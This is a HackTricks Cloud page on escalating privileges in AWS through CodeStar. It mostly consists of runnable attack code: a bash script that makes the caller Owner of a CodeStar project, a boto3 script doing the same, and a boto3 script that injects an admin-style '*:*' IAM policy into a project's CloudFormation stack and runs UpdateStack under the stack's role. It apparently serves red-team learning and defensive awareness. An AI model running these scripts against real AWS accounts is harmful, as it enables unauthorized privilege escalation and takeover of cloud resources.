AWS - Codestar Privesc
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Codestar
You can find more information about codestar in:
codestar:CreateProject, codestar:AssociateTeamMember
iam:PassRole, codestar:CreateProject
With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:
iam:PassRole, codestar:CreateProject
codestar:CreateProject, codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a CodeStar project and codestar:AssociateTeamMember to make an IAM user the Owner of that new project. CodeStar then attaches a new managed policy to the user that grants a few extra permissions. Note that AWS ended support for creating new CodeStar projects on July 31, 2024, so in accounts without existing projects the CreateProject call will fail and only the UpdateTeamMember variant below remains useful.
```bash
PROJECT_NAME="supercodestar"

# 1. Create the project (codestar:CreateProject)
aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name "$PROJECT_NAME" \
    --id "$PROJECT_NAME"

# Project creation is asynchronous
echo "Waiting 1min to start the project"
sleep 60

# 2. Get our own IAM user ARN (sts get-caller-identity returns the same ARN)
USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile \
    | jq -r .UserProfile.IamUserArn)

# 3. Make ourselves Owner of the project (codestar:AssociateTeamMember)
aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id "$PROJECT_NAME" \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed
```
If you are already a member of the project, use codestar:UpdateTeamMember instead of codestar:AssociateTeamMember to change your role to Owner (AssociateTeamMember fails with TeamMemberAlreadyAssociatedException for an existing member).
Potential Impact: Privesc to the CodeStar policy generated for the Owner. You can find an example of that policy in: codestar:CreateProject, codestar:AssociateTeamMember
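The same technique with boto3, including the branch for a caller who is already a project member. This is an added example, not the page's own commands nor AWS or HackTricks code; the project id, the policy-name filter and the FakeCodeStar class are assumptions used to run the decision logic offline, while main() performs the live calls.

```python
"""Become Owner of a CodeStar project and list the policies that grants.

Added example for this page (not the page's own commands, nor HackTricks or
AWS code). FakeCodeStar and the project id used in the offline demo are
assumptions; a live run goes through main() with boto3.
"""
import time


def current_role(codestar, project_id, user_arn):
    """Return the caller's projectRole in the project, or None if not a member.
    Uses codestar:ListTeamMembers and follows nextToken pagination."""
    kwargs = {"projectId": project_id}
    while True:
        page = codestar.list_team_members(**kwargs)
        for member in page.get("teamMembers", []):
            if member["userArn"] == user_arn:
                return member["projectRole"]
        if not page.get("nextToken"):
            return None
        kwargs["nextToken"] = page["nextToken"]


def ensure_owner(codestar, project_id, user_arn):
    """Make user_arn an Owner of project_id and report which action was used.

    Not a member yet  -> codestar:AssociateTeamMember
    Member, not Owner -> codestar:UpdateTeamMember (AssociateTeamMember would
                         fail with TeamMemberAlreadyAssociatedException)
    Already Owner     -> nothing to do
    """
    params = {"projectId": project_id, "userArn": user_arn,
              "projectRole": "Owner", "remoteAccessAllowed": True}
    role = current_role(codestar, project_id, user_arn)
    if role is None:
        codestar.associate_team_member(**params)
        return "AssociateTeamMember"
    if role == "Owner":
        return "AlreadyOwner"
    codestar.update_team_member(**params)
    return "UpdateTeamMember"


def codestar_policy_arns(iam, user_name):
    """ARNs of managed policies attached to the user whose name mentions CodeStar:
    that is where the Owner permissions land (the naming filter is an assumption;
    read the grants with iam:GetPolicyVersion)."""
    attached = iam.list_attached_user_policies(UserName=user_name)["AttachedPolicies"]
    return sorted(p["PolicyArn"] for p in attached if "CodeStar" in p["PolicyName"])


class FakeCodeStar:
    """Offline stand-in for boto3's codestar client (assumption for the demo)."""

    def __init__(self, members):
        self.members = list(members)
        self.calls = []

    def list_team_members(self, projectId, nextToken=None):
        return {"teamMembers": self.members}

    def associate_team_member(self, **kw):
        self.calls.append("AssociateTeamMember")
        self.members.append({"userArn": kw["userArn"], "projectRole": kw["projectRole"],
                             "remoteAccessAllowed": kw["remoteAccessAllowed"]})

    def update_team_member(self, **kw):
        self.calls.append("UpdateTeamMember")
        for member in self.members:
            if member["userArn"] == kw["userArn"]:
                member["projectRole"] = kw["projectRole"]


def main(profile, project_id, user_name):
    """Live run: create the project as on this page, become Owner, list the policies."""
    import boto3  # imported here so the offline demo needs no AWS credentials
    session = boto3.Session(profile_name=profile)
    codestar, iam, sts = session.client("codestar"), session.client("iam"), session.client("sts")
    user_arn = sts.get_caller_identity()["Arn"]  # GetCallerIdentity needs no IAM permission
    try:
        codestar.create_project(name=project_id, id=project_id)
        time.sleep(60)  # project creation is asynchronous; wait as the page does
    except codestar.exceptions.ProjectAlreadyExistsException:
        pass  # reuse an existing project, e.g. one you are already a member of
    print(ensure_owner(codestar, project_id, user_arn))
    print(codestar_policy_arns(iam, user_name))


if __name__ == "__main__":
    import sys
    main(*sys.argv[1:4])  # python3 codestar_owner.py <profile> <project-id> <iam-user-name>
```

Run it with a profile that has only codestar:CreateProject and codestar:AssociateTeamMember (or codestar:UpdateTeamMember for an existing project); the printed policy ARNs are what you inspect next to see what the Owner role actually granted.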
codestar:CreateProjectFromTemplate
- Create a new project: use the (undocumented) codestar:CreateProjectFromTemplate action to create a project from a template. Once the project exists, CodeStar automatically grants the caller cloudformation:UpdateStack on the project's stack, which is associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
- Update the target stack: with that CloudFormation permission, update the stack. Its name follows one of two patterns depending on the chosen template (see the exploit script): awscodestar-<generic project name>-infrastructure or awscodestar-<generic project name>-lambda. Do not pass a RoleARN to UpdateStack: CloudFormation then reuses the role already associated with the stack, so no iam:PassRole is needed.
- Access and permissions: after the update, the resources you added to the template were created with the capabilities of the CloudFormation IAM role linked to the stack. Note: this does not inherently provide full administrator privileges; additional misconfigured resources in the environment might be required to escalate further.
For more information check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/.
You can find the exploit in https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py
Potential Impact: Privesc to cloudformation IAM role.
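The second and third steps above (locate the project stack, re-use its CodeStarWorker role through UpdateStack) as an added boto3 example. It is neither the page's code nor Rhino's CodeStarPrivEsc.py, which must first call the undocumented CreateProjectFromTemplate API; the project id, logical id, injected resource and FakeCloudFormation class are assumptions, and whether the worker role may actually create the injected resource depends on that role's policy, which the page notes is not admin.

```python
"""Leverage cloudformation:UpdateStack on a CodeStar project stack.

Added example for this page (not the page's code nor Rhino's exploit). The
project id, the logical id "PrivescPolicy", the injected resource and
FakeCloudFormation are assumptions; a live run goes through main() with boto3.
"""
import json


def candidate_stack_names(project_id):
    """Stack names CodeStar uses, depending on the template that built the project."""
    return [f"awscodestar-{project_id}-infrastructure", f"awscodestar-{project_id}-lambda"]


def find_project_stack(cfn, project_id):
    """Return (stack_name, role_arn) of the first existing project stack, or None.
    RoleARN is the service role CloudFormation will reuse for our update."""
    for name in candidate_stack_names(project_id):
        try:
            stack = cfn.describe_stacks(StackName=name)["Stacks"][0]
        except Exception as exc:  # botocore ValidationError: "Stack ... does not exist"
            if "does not exist" not in str(exc):
                raise
            continue
        return name, stack.get("RoleARN")
    return None


def load_template(cfn, stack_name):
    """Current template as a dict (boto3 returns JSON templates already parsed;
    a YAML template comes back as a string and needs a YAML parser instead)."""
    body = cfn.get_template(StackName=stack_name)["TemplateBody"]
    return json.loads(body) if isinstance(body, str) else body


def inject_resource(template, logical_id, resource):
    """Copy of template with one extra resource. Existing resources are kept, so
    the update only adds and does not tear down the project's infrastructure."""
    updated = json.loads(json.dumps(template))
    resources = updated.setdefault("Resources", {})
    if logical_id in resources:
        raise ValueError(f"logical id {logical_id} already exists in the stack")
    resources[logical_id] = resource
    return updated


def attacker_policy(user_name):
    """Example payload (assumption): a managed policy attached to the attacker's
    user. The stack's role is not admin, so adapt this to what it may create."""
    statement = [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
    return {"Type": "AWS::IAM::ManagedPolicy",
            "Properties": {"Users": [user_name],
                           "PolicyDocument": {"Version": "2012-10-17", "Statement": statement}}}


def update_with_stack_role(cfn, stack_name, template):
    """Call UpdateStack WITHOUT RoleARN: CloudFormation then reuses the role already
    associated with the stack, so the caller needs no iam:PassRole."""
    resp = cfn.update_stack(StackName=stack_name, TemplateBody=json.dumps(template),
                            Capabilities=["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"])
    return resp["StackId"]


class FakeCloudFormation:
    """Offline stand-in for boto3's cloudformation client (assumption for the demo)."""

    def __init__(self, stacks):
        self.stacks, self.updates = stacks, []  # name -> {"RoleARN": ..., "TemplateBody": ...}

    def describe_stacks(self, StackName):
        if StackName not in self.stacks:
            raise RuntimeError(f"Stack with id {StackName} does not exist")
        return {"Stacks": [{"StackName": StackName, "RoleARN": self.stacks[StackName]["RoleARN"]}]}

    def get_template(self, StackName):
        return {"TemplateBody": self.stacks[StackName]["TemplateBody"]}

    def update_stack(self, **kw):
        self.updates.append(kw)
        return {"StackId": f"arn:aws:cloudformation:us-east-1:123456789012:stack/{kw['StackName']}/fake"}


def main(profile, project_id, user_name):
    import boto3  # only needed for a live run
    cfn = boto3.Session(profile_name=profile).client("cloudformation")
    found = find_project_stack(cfn, project_id)
    if not found:
        raise SystemExit("no awscodestar-* stack found for this project")
    stack_name, role_arn = found
    print(f"updating {stack_name}; CloudFormation will run it as {role_arn}")
    template = inject_resource(load_template(cfn, stack_name), "PrivescPolicy", attacker_policy(user_name))
    update_with_stack_role(cfn, stack_name, template)
    cfn.get_waiter("stack_update_complete").wait(StackName=stack_name)


if __name__ == "__main__":
    import sys
    main(*sys.argv[1:4])  # python3 codestar_stack.py <profile> <project-id> <iam-user-name>
```

If the update fails, `describe-stack-events` on the stack shows which resource the CodeStarWorker role was denied, which tells you what that role can and cannot create before you try another payload.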